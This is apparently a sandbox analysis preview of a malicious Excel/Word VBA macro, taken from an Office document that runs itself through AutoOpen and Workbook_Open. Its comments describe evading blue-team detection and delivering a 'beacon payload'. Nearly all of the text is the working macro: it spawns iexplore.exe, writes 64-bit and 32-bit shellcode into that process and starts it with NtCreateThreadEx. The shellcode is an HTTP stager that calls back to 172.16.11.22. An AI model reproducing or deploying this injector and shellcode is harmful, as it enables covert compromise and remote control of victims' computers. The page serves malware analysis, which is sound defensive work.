VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 689345baedbcbb4925e4b77d2e41c352e66e794c80db58b87854329d905c5245

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
' This script is taken from wepwnise from mwrlabs @ https://github.com/mwrlabs/wepwnise
' Replaced CreateRemoteThread with NtCreateThreadEx to bypass Blue Team IoC
' Payload is raw beacon payload for TundraGale
' 32 Bit API call and payload needs testing
' Binary launched can be modified
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Const MEM_COMMIT = &H1000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_READWRITE = &H40
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const PROCESSOR_ARCHITECTURE_AMD64 = 9
Private Const GENERIC_ALL = &H10000000
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
#If VBA7 Then 'x64 office
Private Declare PtrSafe Function ntCreateThreadEx Lib "ntdll" Alias "NtCreateThreadEx" (ByRef lpThreadId As LongPtr, ByRef accessMask As Long, ByRef objAttributes As Any, ByVal hProcess As Long, ByVal lpStartAddress As LongPtr, ByVal lpParameter As Any, ByVal createSuspended As Long, ByVal lpStackZero As Long, ByVal lpStackSizeCommit As Long, ByVal lpStackReserved As Long, threadInfo As Any) As Long
Private Declare PtrSafe Function terminateProcess Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
Private Declare PtrSafe Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function virtualFreeEx Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal dwFreeType As Long) As LongPtr
Private Declare PtrSafe Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As LongPtr
Private Declare PtrSafe Sub getSysInfo Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
Private Declare PtrSafe Function getCurrProc Lib "kernel32" Alias "GetCurrentProcess" () As LongPtr
Private Declare PtrSafe Function is64Proc Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As LongPtr, ByRef Wow64Process As Boolean) As Boolean
Private Declare PtrSafe Function createProcA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Type SYSTEM_INFO
wProcessorArchitecture As Integer
wReserved As Integer
dwPageSize As Long
lpMinimumApplicationAddress As LongPtr
lpMaximumApplicationAddress As LongPtr
dwActiveProcessorMask As LongPtr
dwNumberOrfProcessors As Long
dwProcessorType As Long
dwAllocationGranularity As Long
wProcessorLevel As Integer
wProcessorRevision As Integer
End Type
#Else
Private Declare Function ntCreateThreadEx Lib "ntdll.dll" Alias "NtCreateThreadEx" (ByVal lpThreadId as LongPtr, ByVal accessMask as Any, ByRef objectAttributes as Any, ByVal hProcess as Long, ByVal lpStartAddress As LongPtr, lpParameter As Any, ByVal createSuspended as Boolean, lpStackZero as Long, lpStackSizeCommit as Long, lpStackReserved as long, threadInfo as Any) as Long
Private Declare Function terminateProcess Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
Private Declare Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function virtualFreeEx Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function createRemoteThread Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Sub getSysInfo Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
Private Declare Function getCurrProc Lib "kernel32" Alias "GetCurrentProcess" () As Long
Private Declare Function is64Proc Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As Long, ByRef Wow64Process As Boolean) As Boolean
Private Declare Function createProcA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Type SYSTEM_INFO
wProcessorArchitecture As Integer
wReserved As Integer
dwPageSize As Long
lpMinimumApplicationAddress As Long
lpMaximumApplicationAddress As Long
dwActiveProcessorMask As Long
dwNumberOrfProcessors As Long
dwProcessorType As Long
dwAllocationGranularity As Long
dwReserved As Long
End Type
#End If
Dim inject64 As Boolean
Public Function IsOffice64Bit() As Boolean
Dim lpSystemInfo As SYSTEM_INFO
Call getSysInfo(lpSystemInfo)
If lpSystemInfo.wProcessorArchitecture = PROCESSOR_ARCHITECTURE_AMD64 Then
Call is64Proc(getCurrProc(), IsOffice64Bit)
IsOffice64Bit = Not IsOffice64Bit
End If
End Function
Public Function IsWow64(handle As Long) As Boolean
Call is64Proc(handle, t)
IsWow64 = Not t
End Function
Public Function getList() As String()
Dim myList As String
' list of binaries to try
myList = ""
myList = myList & "C:\Windows\System32\iexplore.exe" & ","
myList = myList & "C:\Windows\SysWOW64\iexplore.exe" & ","
myArray = Split(myList, ",")
Dim c As Integer
Dim list() As String
For c = LBound(myArray) To (UBound(myArray) - 1)
ReDim Preserve list(c)
list(c) = myArray(c)
Next
getList = list
End Function
Public Function Run() As Long
myArray = getList
Dim Count As Integer
Dim Success As Integer
For Count = LBound(myArray) To UBound(myArray)
Dim proc As String
proc = myArray(Count)
Success = Inject(proc)
If Success = 1 Then Exit For
Next
End Function
Public Function Inject(processCmd As String) As Long
Dim myByte As Long, buf As Variant, myCount As Long, hProcess As Long
#If VBA7 Then
    Dim lLinkToLibary As Long, comp As LongPtr, hThread As LongPtr
#Else
    Dim lLinkToLibary As Long, comp As Long, hThread As Long
#End If
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
sInfo.dwFlags = 1
If IsOffice64Bit Then
On Error Resume Next
sProc = processCmd
' Spawn process
res = createProcA(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
hProcess = pInfo.hProcess
Dim b64 As Boolean
b64 = False
b64 = IsWow64(hProcess)
inject64 = True
If b64 = True Then
If inject64 = True Then
If hProcess = 0 Then
Exit Function
End If
'//function definition for VirtualAllocEx
'LPVOID VirtualAllocEx(
'  HANDLE hProcess,
'  LPVOID lpAddress,
'  SIZE_T dwSize, // Size of the byte array below
'  DWORD  flAllocationType,
'  DWORD  flProtect
');
lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H3BB, &H3000, PAGE_READWRITE)
If lLinkToLibrary = 0 Then
term = terminateProcess(hProcess, leave_func) ' bail
Exit Function
End If
Position = lLinkToLibrary
' 64 bit payload
buf = Array(72, 131, 228, 240, 232, 200, 0, 0, 0, 65, 81, 65, 80, 82, 81, 86, 72, 49, 210, 101, 72, 139, 82, 96, 72, 139, 82, 24, 72, 139, 82, 32, 72, 139, 114, 80, 72, 15, 183, 74, 74, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, 11, 2, 117, 114, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 80, 139, 72, _
24, 68, 139, 64, 32, 73, 1, 208, 227, 86, 72, 255, 201, 65, 139, 52, 136, 72, 1, 214, 77, 49, 201, 72, 49, 192, 172, 65, 193, 201, 13, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, 208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, _
72, 139, 18, 233, 79, 255, 255, 255, 93, 106, 0, 73, 190, 119, 105, 110, 105, 110, 101, 116, 0, 65, 86, 73, 137, 230, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 72, 49, 201, 72, 49, 210, 77, 49, 192, 77, 49, 201, 65, 80, 65, 80, 65, 186, 58, 86, 121, 167, 255, 213, 233, 147, 0, 0, 0, 90, 72, 137, 193, 65, 184, 187, 1, 0, 0, 77, 49, 201, 65, 81, 65, 81, 106, 3, 65, 81, 65, 186, 87, 137, 159, 198, 255, 213, 235, 121, 91, 72, 137, _
193, 72, 49, 210, 73, 137, 216, 77, 49, 201, 82, 104, 0, 50, 160, 132, 82, 82, 65, 186, 235, 85, 46, 59, 255, 213, 72, 137, 198, 72, 131, 195, 80, 106, 10, 95, 72, 137, 241, 186, 31, 0, 0, 0, 106, 0, 104, 128, 51, 0, 0, 73, 137, 224, 65, 185, 4, 0, 0, 0, 65, 186, 117, 70, 158, 134, 255, 213, 72, 137, 241, 72, 137, 218, 73, 199, 192, 255, 255, 255, 255, 77, 49, 201, 82, 82, 65, 186, 45, 6, 24, 123, 255, 213, 133, 192, 15, 133, 157, 1, _
0, 0, 72, 255, 207, 15, 132, 140, 1, 0, 0, 235, 179, 233, 228, 1, 0, 0, 232, 130, 255, 255, 255, 47, 81, 66, 100, 102, 0, 27, 33, 58, 1, 183, 209, 29, 42, 124, 97, 241, 214, 82, 48, 8, 253, 204, 103, 26, 114, 91, 72, 198, 51, 7, 51, 251, 22, 54, 4, 60, 169, 253, 130, 97, 70, 109, 163, 119, 171, 238, 224, 219, 56, 39, 67, 50, 44, 206, 6, 171, 248, 101, 122, 169, 174, 190, 216, 202, 224, 175, 192, 201, 137, 225, 178, 48, 193, 44, 48, 238, _
236, 100, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 219, 247, 132, 185, 202, 195, 106, 44, 187, 212, 64, 110, 172, _
139, 22, 10, 192, 217, 24, 178, 100, 178, 88, 185, 187, 18, 143, 149, 31, 175, 186, 35, 154, 20, 184, 151, 18, 224, 131, 176, 15, 187, 93, 243, 246, 112, 68, 106, 133, 143, 77, 7, 8, 254, 32, 131, 225, 169, 35, 164, 238, 154, 136, 83, 192, 85, 25, 136, 138, 97, 197, 146, 96, 147, 58, 226, 177, 2, 3, 65, 109, 197, 104, 174, 181, 188, 47, 107, 239, 17, 226, 200, 143, 21, 38, 243, 159, 124, 211, 195, 252, 106, 88, 213, 169, 128, 124, 191, 56, 223, 44, 10, 33, _
195, 12, 225, 25, 82, 249, 128, 142, 136, 94, 195, 188, 189, 235, 78, 111, 158, 44, 123, 10, 145, 8, 57, 113, 139, 6, 94, 31, 71, 90, 4, 126, 6, 229, 1, 50, 47, 205, 65, 67, 130, 68, 64, 234, 16, 132, 143, 10, 25, 182, 96, 247, 210, 25, 238, 30, 194, 216, 35, 238, 237, 237, 122, 205, 51, 38, 73, 25, 113, 235, 94, 105, 117, 122, 29, 63, 163, 204, 124, 30, 79, 27, 201, 253, 179, 57, 181, 52, 0, 103, 59, 103, 237, 100, 49, 5, 120, 250, 203, 221, _
86, 125, 243, 222, 225, 196, 0, 65, 190, 240, 181, 162, 86, 255, 213, 72, 49, 201, 186, 0, 0, 64, 0, 65, 184, 0, 16, 0, 0, 65, 185, 64, 0, 0, 0, 65, 186, 88, 164, 83, 229, 255, 213, 72, 147, 83, 83, 72, 137, 231, 72, 137, 241, 72, 137, 218, 65, 184, 0, 32, 0, 0, 73, 137, 249, 65, 186, 18, 150, 137, 226, 255, 213, 72, 131, 196, 32, 133, 192, 116, 182, 102, 139, 7, 72, 1, 195, 133, 192, 117, 215, 88, 88, 88, 72, 5, 0, 0, 0, 0, _
80, 195, 232, 127, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155)
For myCount = LBound(buf) To UBound(buf)
myByte = buf(myCount)
'//function definition for WriteProcessMemory (documented WinAPI)
'BOOL WriteProcessMemory(
'  HANDLE  hProcess,
'  LPVOID  lpBaseAddress,
'  LPCVOID lpBuffer,
'  SIZE_T  nSize,
'  SIZE_T  *lpNumberOfBytesWritten
');
comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
Next myCount
'//function definition for NtCreateThreadEx (undocumented WinAPI)
'typedef NTSTATUS(WINAPI *pNtCreateThreadEx)(
'    OUT PHANDLE hThread,
'    IN ACCESS_MASK DesiredAccess,
'    IN LPVOID ObjectAttributes,
'    IN HANDLE ProcessHandle,
'    IN LPTHREAD_START_ROUTINE lpStartAddress,
'    IN LPVOID lpParameter,
'    IN SIZE_T CreateSuspended, //(BOOL)
'    IN SIZE_T StackZeroBits,
'    IN SIZE_T SizeOfStackCommit,
'    IN SIZE_T SizeOfStackReserve,
'    OUT LPVOID lpBytesBuffer
retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&)
End If
If hThread = 0 Or inject64 = False Then
If lLinkToLibrary <> 0 Then
virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE
End If
hProcess = pInfo.hProcess
term = terminateProcess(hProcess, leave_func)
Exit Function
Else
Inject = 1 'Success
End If
Else
If hProcess = 0 Then
Exit Function
End If
lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H35E, &H3000, PAGE_READWRITE)
If lLinkToLibrary = 0 Then
term = terminateProcess(hProcess, leave_func)
Exit Function
End If
Position = lLinkToLibrary
' 32bit payload
buf = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, _
117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 232, 0, 0, 0, 0, 49, 255, 87, 87, 87, 87, 87, 104, 58, 86, 121, 167, 255, 213, 233, 164, 0, 0, 0, 91, 49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, _
104, 87, 137, 159, 198, 255, 213, 80, 233, 140, 0, 0, 0, 91, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 83, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 131, 195, 80, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 95, 49, 255, 87, 87, 106, 255, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 15, 132, 202, 1, 0, 0, 49, 255, 133, 246, 116, 4, 137, 249, 235, 9, 104, 170, 197, 226, 93, 255, _
213, 137, 193, 104, 69, 33, 94, 49, 255, 213, 49, 255, 87, 106, 7, 81, 86, 80, 104, 183, 87, 224, 11, 255, 213, 191, 0, 47, 0, 0, 57, 199, 117, 7, 88, 80, 233, 123, 255, 255, 255, 49, 255, 233, 145, 1, 0, 0, 233, 201, 1, 0, 0, 232, 111, 255, 255, 255, 47, 79, 118, 76, 75, 0, 169, 42, 221, 124, 196, 96, 154, 90, 224, 142, 173, 219, 39, 131, 63, 21, 215, 79, 242, 87, 128, 167, 31, 24, 106, 185, 27, 24, 75, 127, 98, 51, 90, 176, 225, 236, _
174, 35, 82, 148, 23, 36, 5, 39, 181, 137, 2, 21, 151, 43, 38, 233, 192, 81, 241, 199, 146, 43, 7, 3, 68, 238, 83, 216, 195, 160, 174, 40, 28, 201, 15, 79, 67, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, _
114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 196, 128, 46, 161, 63, 82, 247, 230, 37, 33, 129, 32, 183, 91, 107, 87, 165, 245, 80, 211, 106, 92, 117, 40, 90, 248, 185, 221, 179, 139, 225, 127, 69, 184, 42, 18, 202, 172, 209, 75, 17, 2, 91, 205, 187, 160, 43, 80, 26, 240, 3, 142, 161, 114, 161, 225, 205, 231, 18, 20, 210, 214, 83, 148, 249, 193, 205, 69, 192, 178, 83, 61, 72, 207, 167, 163, 38, 49, _
113, 23, 224, 68, 206, 213, 123, 179, 10, 90, 55, 149, 62, 213, 201, 23, 40, 104, 235, 142, 120, 15, 14, 158, 185, 159, 28, 99, 94, 246, 224, 189, 51, 49, 154, 216, 100, 116, 91, 113, 233, 131, 49, 2, 211, 254, 149, 222, 20, 142, 162, 209, 152, 40, 19, 35, 218, 138, 219, 89, 131, 23, 28, 95, 20, 171, 65, 145, 200, 82, 236, 97, 185, 132, 17, 58, 7, 230, 214, 44, 234, 73, 119, 116, 99, 169, 197, 129, 79, 164, 74, 185, 241, 143, 163, 173, 238, 178, 118, 122, _
235, 243, 137, 213, 32, 171, 37, 219, 74, 11, 167, 81, 114, 19, 100, 81, 69, 226, 239, 56, 166, 252, 172, 174, 225, 21, 207, 79, 109, 99, 108, 208, 132, 112, 74, 58, 236, 133, 153, 72, 78, 0, 104, 240, 181, 162, 86, 255, 213, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, 164, 83, 229, 255, 213, 147, 185, 0, 0, 0, 0, 1, 217, 81, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 198, _
139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 232, 137, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155)
For myCount = LBound(buf) To UBound(buf)
myByte = buf(myCount)
comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
Next myCount
retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&)
If hThread = 0 Then
If lLinkToLibrary <> 0 Then
virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE
End If
hProcess = pInfo.hProcess
term = terminateProcess(hProcess, leave_func)
Exit Function
Else
Inject = 1 'Success
End If
End If
Else
sProc = processCmd
res = createProcA(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
hProcess = pInfo.hProcess
If hProcess = 0 Then
Exit Function
End If
lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H35E, &H3000, PAGE_READWRITE)
If lLinkToLibrary = 0 Then
term = terminateProcess(hProcess, leave_func)
Exit Function
End If
Position = lLinkToLibrary
' 32bit payload
buf = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, _
117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 232, 0, 0, 0, 0, 49, 255, 87, 87, 87, 87, 87, 104, 58, 86, 121, 167, 255, 213, 233, 164, 0, 0, 0, 91, 49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, _
104, 87, 137, 159, 198, 255, 213, 80, 233, 140, 0, 0, 0, 91, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 83, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 131, 195, 80, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 95, 49, 255, 87, 87, 106, 255, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 15, 132, 202, 1, 0, 0, 49, 255, 133, 246, 116, 4, 137, 249, 235, 9, 104, 170, 197, 226, 93, 255, _
213, 137, 193, 104, 69, 33, 94, 49, 255, 213, 49, 255, 87, 106, 7, 81, 86, 80, 104, 183, 87, 224, 11, 255, 213, 191, 0, 47, 0, 0, 57, 199, 117, 7, 88, 80, 233, 123, 255, 255, 255, 49, 255, 233, 145, 1, 0, 0, 233, 201, 1, 0, 0, 232, 111, 255, 255, 255, 47, 79, 118, 76, 75, 0, 169, 42, 221, 124, 196, 96, 154, 90, 224, 142, 173, 219, 39, 131, 63, 21, 215, 79, 242, 87, 128, 167, 31, 24, 106, 185, 27, 24, 75, 127, 98, 51, 90, 176, 225, 236, _
174, 35, 82, 148, 23, 36, 5, 39, 181, 137, 2, 21, 151, 43, 38, 233, 192, 81, 241, 199, 146, 43, 7, 3, 68, 238, 83, 216, 195, 160, 174, 40, 28, 201, 15, 79, 67, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, _
114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 196, 128, 46, 161, 63, 82, 247, 230, 37, 33, 129, 32, 183, 91, 107, 87, 165, 245, 80, 211, 106, 92, 117, 40, 90, 248, 185, 221, 179, 139, 225, 127, 69, 184, 42, 18, 202, 172, 209, 75, 17, 2, 91, 205, 187, 160, 43, 80, 26, 240, 3, 142, 161, 114, 161, 225, 205, 231, 18, 20, 210, 214, 83, 148, 249, 193, 205, 69, 192, 178, 83, 61, 72, 207, 167, 163, 38, 49, _
113, 23, 224, 68, 206, 213, 123, 179, 10, 90, 55, 149, 62, 213, 201, 23, 40, 104, 235, 142, 120, 15, 14, 158, 185, 159, 28, 99, 94, 246, 224, 189, 51, 49, 154, 216, 100, 116, 91, 113, 233, 131, 49, 2, 211, 254, 149, 222, 20, 142, 162, 209, 152, 40, 19, 35, 218, 138, 219, 89, 131, 23, 28, 95, 20, 171, 65, 145, 200, 82, 236, 97, 185, 132, 17, 58, 7, 230, 214, 44, 234, 73, 119, 116, 99, 169, 197, 129, 79, 164, 74, 185, 241, 143, 163, 173, 238, 178, 118, 122, _
235, 243, 137, 213, 32, 171, 37, 219, 74, 11, 167, 81, 114, 19, 100, 81, 69, 226, 239, 56, 166, 252, 172, 174, 225, 21, 207, 79, 109, 99, 108, 208, 132, 112, 74, 58, 236, 133, 153, 72, 78, 0, 104, 240, 181, 162, 86, 255, 213, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, 164, 83, 229, 255, 213, 147, 185, 0, 0, 0, 0, 1, 217, 81, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 198, _
139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 232, 137, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155)
For myCount = LBound(buf) To UBound(buf)
myByte = buf(myCount)
comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
Next myCount
retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&)
If hThread = 0 Then
If lLinkToLibrary <> 0 Then
virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE
End If
hProcess = pInfo.hProcess
term = terminateProcess(hProcess, leave_func)
Exit Function
Else
Inject = 1 'Success
End If
End If
End Function
Sub AutoOpen()
Run
End Sub
Private Sub Workbook_Open()
Run
End Sub
Sub Auto_Open()
Run
End Sub





Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.